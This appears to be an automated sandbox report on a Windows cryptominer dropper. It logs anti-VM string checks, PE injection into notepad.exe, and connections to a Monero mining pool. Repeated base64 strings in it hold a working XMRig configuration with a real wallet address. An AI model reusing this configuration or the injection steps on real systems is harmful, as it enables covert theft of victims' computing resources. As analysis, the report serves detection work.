Source: cfg.13.dr	Binary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiAyDQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogInhtci11cy1lYXN0MS5uYW5vcG9vbC5vcmc6MTQ0NDQiLA0KCQkJInVzZXIiOiAiNDhRYlBaVXRXbThnRzZUNmVnNkg3SkdYYUQ2ZU5KSDhvM1JveUxnQmVxeW03VHh5ZFU5VGZNZlVVZ2FoZXFhN0JGZGh0ZmI5ZDY2NUNnWURqNmY1S3ZkakxlR0ptZFcuV09SS0VSL3BpY2t0dXRvcyIsDQoJCQkicGFzcyI6ICJ4IiwNCgkJCSJyaWctaWQiOiBudWxsLA0KCQkJIm5pY2VoYXNoIjogZmFsc2UsDQoJCQkia2VlcGFsaXZlIjogZmFsc2UsDQoJCQkiZW5hYmxlZCI6IHRydWUsDQoJCQkidGxzIjogZmFsc2UsDQoJCQkidGxzLWZpbmdlcnByaW50IjogbnVsbCwNCgkJCSJkYWVtb24iOiBmYWxzZSwNCgkJCSJzZWxmLXNlbGVjdCI6IG51bGwNCgkJfQ0KCV0sDQoJInByaW50LXRpbWUiOiA2MCwNCgkiaGVhbHRoLXByaW50LXRpbWUiOiA2MCwNCgkicmV0cmllcyI6IDUsDQoJInJldHJ5LXBhdXNlIjogNSwNCgkic3lzbG9nIjogZmFsc2UsDQoJInVzZXItYWdlbnQiOiBudWxsLA0KCSJ3YXRjaCI6IGZhbHNlDQp9AA==
Source: cfgi.13.dr	Binary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiA0DQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogInhtci11cy1lYXN0MS5uYW5vcG9vbC5vcmc6MTQ0NDQiLA0KCQkJInVzZXIiOiAiNDhRYlBaVXRXbThnRzZUNmVnNkg3SkdYYUQ2ZU5KSDhvM1JveUxnQmVxeW03VHh5ZFU5VGZNZlVVZ2FoZXFhN0JGZGh0ZmI5ZDY2NUNnWURqNmY1S3ZkakxlR0ptZFcuV09SS0VSL3BpY2t0dXRvcyIsDQoJCQkicGFzcyI6ICJ4IiwNCgkJCSJyaWctaWQiOiBudWxsLA0KCQkJIm5pY2VoYXNoIjogZmFsc2UsDQoJCQkia2VlcGFsaXZlIjogZmFsc2UsDQoJCQkiZW5hYmxlZCI6IHRydWUsDQoJCQkidGxzIjogZmFsc2UsDQoJCQkidGxzLWZpbmdlcnByaW50IjogbnVsbCwNCgkJCSJkYWVtb24iOiBmYWxzZSwNCgkJCSJzZWxmLXNlbGVjdCI6IG51bGwNCgkJfQ0KCV0sDQoJInByaW50LXRpbWUiOiA2MCwNCgkiaGVhbHRoLXByaW50LXRpbWUiOiA2MCwNCgkicmV0cmllcyI6IDUsDQoJInJldHJ5LXBhdXNlIjogNSwNCgkic3lzbG9nIjogZmFsc2UsDQoJInVzZXItYWdlbnQiOiBudWxsLA0KCSJ3YXRjaCI6IGZhbHNlDQp9AA==
Source: tmp70CEtmp.exe, 0000000D.00000002.910423735.00000000011EE000.00000004.00000020.sdmp	Binary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiA0DQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogInhtci11cy1lYXN0MS5uYW5vcG9vbC5vcmc6MTQ0NDQiLA0KCQkJInVzZXIiOiAiNDhRYlBaVXRXbThnRzZUNmVnNkg3SkdYYUQ2ZU5KSDhvM1JveUxnQmVxeW03VHh5ZFU5VGZNZlVVZ2FoZXFhN0JGZGh0ZmI5ZDY2NUNnWURqNmY1S3ZkakxlR0ptZFcuV09SS0VSL3BpY2t0dXRvcyIsDQoJCQkicGFzcyI6ICJ4IiwNCgkJCSJyaWctaWQiOiBudWxsLA0KCQkJIm5pY2VoYXNoIjogZmFsc2UsDQoJCQkia2VlcGFsaXZlIjogZmFsc2UsDQoJCQkiZW5hYmxlZCI6IHRydWUsDQoJCQkidGxzIjogZmFsc2UsDQoJCQkidGxzLWZpbmdlcnByaW50IjogbnVsbCwNCgkJCSJkYWVtb24iOiBmYWxzZSwNCgkJCSJzZWxmLXNlbGVjdCI6IG51bGwNCgkJfQ0KCV0sDQoJInByaW50LXRpbWUiOiA2MCwNCgkiaGVhbHRoLXByaW50LXRpbWUiOiA2MCwNCgkicmV0cmllcyI6IDUsDQoJInJldHJ5LXBhdXNlIjogNSwNCgkic3lzbG9nIjogZmFsc2UsDQoJInVzZXItYWdlbnQiOiBudWxsLA0KCSJ3YXRjaCI6IGZhbHNlDQp9AA==d5 h5
Source: tmp70CEtmp.exe, 0000000D.00000002.910364506.00000000011A8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWP
Source: tmp70CEtmp.exe	Binary or memory string: o5Q/JuhlHzyiu5xNZSs8oomwX2liOqCB\7PnwoJnYRf0LPoeh5vgGEWSu580GXNQuEHQZxGPS4AyMnuXQtx+M7LxYQaxBjTcO6kyJ23UvuQrc2vo9z7g4ozLJYvhFYKNW3sGRpb\7hstAbPRfbrItzKyFTW5/eV/YDtTBUJkwrzgQUJQMHueS9VmciiY13MpGN/yCPRKcRZumiyBEG20FLO+Prwa/bEeJUozeplMORvyDT\74JNK1D07QSd3sAPSySBD
Source: svchost.exe, 00000007.00000002.762024248.0000022EE98EA000.00000004.00000001.sdmp, tmp70CEtmp.exe, 0000000D.00000002.910423735.00000000011EE000.00000004.00000020.sdmp, notepad.exe, 0000000F.00000002.909077622.0000018B881B8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: tmp70CEtmp.exe, 0000000D.00000002.910423735.00000000011EE000.00000004.00000020.sdmp	Binary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiAyDQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogInhtci11cy1lYXN0MS5uYW5vcG9vbC5vcmc6MTQ0NDQiLA0KCQkJInVzZXIiOiAiNDhRYlBaVXRXbThnRzZUNmVnNkg3SkdYYUQ2ZU5KSDhvM1JveUxnQmVxeW03VHh5ZFU5VGZNZlVVZ2FoZXFhN0JGZGh0ZmI5ZDY2NUNnWURqNmY1S3ZkakxlR0ptZFcuV09SS0VSL3BpY2t0dXRvcyIsDQoJCQkicGFzcyI6ICJ4IiwNCgkJCSJyaWctaWQiOiBudWxsLA0KCQkJIm5pY2VoYXNoIjogZmFsc2UsDQoJCQkia2VlcGFsaXZlIjogZmFsc2UsDQoJCQkiZW5hYmxlZCI6IHRydWUsDQoJCQkidGxzIjogZmFsc2UsDQoJCQkidGxzLWZpbmdlcnByaW50IjogbnVsbCwNCgkJCSJkYWVtb24iOiBmYWxzZSwNCgkJCSJzZWxmLXNlbGVjdCI6IG51bGwNCgkJfQ0KCV0sDQoJInByaW50LXRpbWUiOiA2MCwNCgkiaGVhbHRoLXByaW50LXRpbWUiOiA2MCwNCgkicmV0cmllcyI6IDUsDQoJInJldHJ5LXBhdXNlIjogNSwNCgkic3lzbG9nIjogZmFsc2UsDQoJInVzZXItYWdlbnQiOiBudWxsLA0KCSJ3YXRjaCI6IGZhbHNlDQp9AA=='
Source: tmp70CEtmp.exe, 00000004.00000002.802365791.0000000002A95000.00000004.00000001.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: LZF5sOWnss.exe, 00000000.00000002.710457697.000000001B470000.00000002.00000001.sdmp, svchost.exe, 00000001.00000002.656761658.000001F164260000.00000002.00000001.sdmp, svchost.exe, 00000003.00000002.709100606.000002AFD9480000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.727226826.000001C0CDEC0000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.762689241.0000022EEA800000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: LZF5sOWnss.exe, 00000000.00000002.710457697.000000001B470000.00000002.00000001.sdmp, svchost.exe, 00000001.00000002.656761658.000001F164260000.00000002.00000001.sdmp, svchost.exe, 00000003.00000002.709100606.000002AFD9480000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.727226826.000001C0CDEC0000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.762689241.0000022EEA800000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: tmp70CEtmp.exe	Binary or memory string: JI/VeLlt9QHyBDUyEvAeR9f/w5uKT9kRIwabc64Oej/eIR8xRp6z9JLNqa/7RKO94cjV2+ahqeMUCzIE5vCtMjNMHeUe8qh5hS\7kYSPf4rQpMdeDbMbAWLvL2pcL2cqjsvqhe9B/2iiFQyklwB/DIhC9I0SN5xBbz/943HsXHJ9OP3Co1/KVFNGRLu+YSBF8VssbJlvA\71tDNVksfLiDe9EPjHgv6+6CkYT0gBOKtqXLh2Nm1VK1DJexTWP9bIDu2h
Source: tmp70CEtmp.exe	Binary or memory string: Sa/ClFiaf3NmG/bqd5yROUpeJOUUpCB9ib7rxFsPQrE5j4dHFtDrxI2\7rHRx1un/BFkKrvkoKV2JZL6XXnpjgzuRMiFXqspzzyBVEoGs4PqfT6ccmcANWi872iqwtgxlR8qe5BQcIjpxOcoYAV7+Ym4qqgADs\7hHGFsU40jYSTj1Qg5vNB9OfxSqDP7w/X3mBGv4/8DT5DfFpl8xc9Flmakt04M5TFj9gHr8C+COCwxyUhI4mfkhkbZZu0ONdmsVDK
Source: LZF5sOWnss.exe, 00000000.00000002.704936731.0000000000D7C000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: LZF5sOWnss.exe, 00000000.00000002.710457697.000000001B470000.00000002.00000001.sdmp, svchost.exe, 00000001.00000002.656761658.000001F164260000.00000002.00000001.sdmp, svchost.exe, 00000003.00000002.709100606.000002AFD9480000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.727226826.000001C0CDEC0000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.762689241.0000022EEA800000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

Code function: 13_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,FreeLibrary,

13_2_004080E0

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Code function: 13_2_00402E40 mov eax, dword ptr fs:[00000030h]		13_2_00402E40
Source: C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe	Code function: 14_2_013C2E40 mov eax, dword ptr fs:[00000030h]		14_2_013C2E40

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

Code function: 13_2_00401800 GetProcessHeap,HeapAlloc,

13_2_00401800

Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\LZF5sOWnss.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\notepad.exe	Network Connect: 142.44.242.100 108			Jump to behavior
Source: C:\Windows\notepad.exe	Domain query: xmr-us-east1.nanopool.org

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Memory allocated: C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe base: 13C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Memory allocated: C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe base: CA0000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Memory allocated: C:\Windows\notepad.exe base: 400000 protect: page read and write	Jump to behavior

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

Thread created: C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe EIP: 13C8390

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Memory written: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Memory written: C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe base: 13C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Memory written: C:\Windows\notepad.exe base: 400000 value starts with: 4D5A	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe

Thread register set: target process: 684

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Memory written: C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe base: 13C0000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Memory written: C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe base: CA0000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Memory written: C:\Windows\notepad.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Memory written: C:\Windows\notepad.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Memory written: C:\Windows\notepad.exe base: 938000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Memory written: C:\Windows\notepad.exe base: A15000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Memory written: C:\Windows\notepad.exe base: 6B2E3B010	Jump to behavior

Source: C:\Program Files (x86)\UKhhFjtKmLGDGFhcrhfEyHJPMmjsYZTiDurTQvfJZvfLNAauVSht\kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe

Code function: DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,Process32Next,CloseHandle,FreeLibrary, explorer.exe

14_2_013C80E0

Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe 'C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Process created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'	Jump to behavior

Source: tmp70CEtmp.exe, 0000000D.00000002.910567410.0000000001A30000.00000002.00000001.sdmp, kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe, 0000000E.00000002.910019191.0000000001C60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: tmp70CEtmp.exe, 0000000D.00000002.910567410.0000000001A30000.00000002.00000001.sdmp, kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe, 0000000E.00000002.910019191.0000000001C60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: tmp70CEtmp.exe, 0000000D.00000002.910567410.0000000001A30000.00000002.00000001.sdmp, kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe, 0000000E.00000002.910019191.0000000001C60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: tmp70CEtmp.exe, 0000000D.00000002.910567410.0000000001A30000.00000002.00000001.sdmp, kZyzpfHFNNGrokCvTtkFvKwVRsROC.exe, 0000000E.00000002.910019191.0000000001C60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\LZF5sOWnss.exe	Queries volume information: C:\Users\user\Desktop\LZF5sOWnss.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
